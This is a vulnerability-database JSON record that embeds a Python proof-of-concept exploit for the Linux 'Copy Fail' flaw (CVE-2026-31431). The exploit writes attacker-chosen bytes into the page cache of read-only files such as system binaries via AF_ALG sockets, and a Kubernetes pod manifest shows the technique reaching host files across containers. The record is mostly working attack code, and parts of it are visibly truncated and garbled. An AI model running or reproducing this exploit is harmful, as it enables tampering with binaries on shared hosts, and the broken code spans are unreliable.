{"uuid": "06cf5cb9-7290-42cc-9b80-6d03ac67933b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/0xlane/d89e230c9e18bfd8cc126452352afae6", "content": "#!/usr/bin/env python3\n\"\"\"\nCVE-2026-31431 \"Copy Fail\" \u2014 Page Cache Marker for Container Experiments\n=========================================================================\nWrites 0xDEADBEEF to the first 4 bytes of a target file's page cache.\nUsed to demonstrate cross-container page cache sharing via shared image layers.\n\nUsage:\n    python3 poc_marker.py \n    python3 poc_marker.py /bin/cat\n    python3 poc_marker.py /etc/os-release\n\nRequirements:\n    - Linux kernel vulnerable to CVE-2026-31431 (2017-07 to 2026-04)\n    - AF_ALG socket support (CONFIG_CRYPTO_USER_API_AEAD)\n    - authencesn algorithm available\n\nFor academic research only.\n\"\"\"\n\nimport os\nimport sys\nimport socket\nimport struct\n\nAF_ALG = 38\nSOL_ALG = 279\nALG_SET_KEY = 1\nALG_SET_IV = 2\nALG_SET_OP = 3\nALG_SET_AEAD_ASSOCLEN = 4\nALG_SET_AEAD_AUTHSIZE = 5\n\nAUTHSIZE = 4\nASSOCLEN = 8\nMSG_MORE = 0x8000\n\n\ndef page_cache_write_4bytes(target_fd, file_offset, value_bytes):\n    \"\"\"Write 4 bytes to target file's page cache at given offset.\"\"\"\n    alg_sock = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)\n    alg_sock.bind((\"aead\", \"authencesn(hmac(sha256),cbc(aes))\"))\n\n    # Key: rtattr(8) + authkey(16) + enckey(16) = 40 bytes\n    key = struct.pack('I', 16) + b'\\x00' * 32\n    alg_sock.setsockopt(SOL_ALG, ALG_SET_KEY, key)\n    alg_sock.setsockopt(SOL_ALG, ALG_SET_AEAD_AUTHSIZE, None, AUTHSIZE)\n\n    req_sock, _ = alg_sock.accept()\n\n    # AAD: [0:4]=padding, [4:8]=value to write into page cache\n    aad = b'\\x00' * 4 + value_bytes\n    cmsg = [\n        (SOL_ALG, ALG_SET_OP, struct.pack(' [hex_value]\")\n        sys.exit(1)\n\n    target = sys.argv[1]\n    value = 0xDEADBEEF\n    if len(sys.argv) &gt; 2:\n        value = int(sys.argv[2], 16)\n\n    fd = os.open(target, os.O_RDONLY)\n\n    # Read original bytes\n    original = os.pread(fd, 16, 0)\n    print(f\"[*] Target: {target}\")\n    print(f\"[*] Before: {original[:4].hex()}\")\n\n    # Write 4 bytes to page cache offset 0\n    page_cache_write_4bytes(fd, 0, struct.pack(' /proc/sys/vm/drop_caches\n\n---\napiVersion: v1\nkind: Pod\nmetadata:\n  name: hostpath-test\n  namespace: copyfail-lab\nspec:\n  containers:\n  - name: test\n    image: python:3.11-slim\n    command: [\"sleep\", \"infinity\"]\n  volumes:\n  - name: host-bin\n    hostPath:\n      path: /usr/bin\n      type: Directory\n  containers:\n  - name: test\n    image: python:3.11-slim\n    command: [\"sleep\", \"infinity\"]\n    volumeMounts:\n    - name: host-bin\n      mountPath: /hostbin\n      readOnly: true    # This does NOT prevent page cache corruption!\n", "creation_timestamp": "2026-05-08T04:30:22.000000Z"}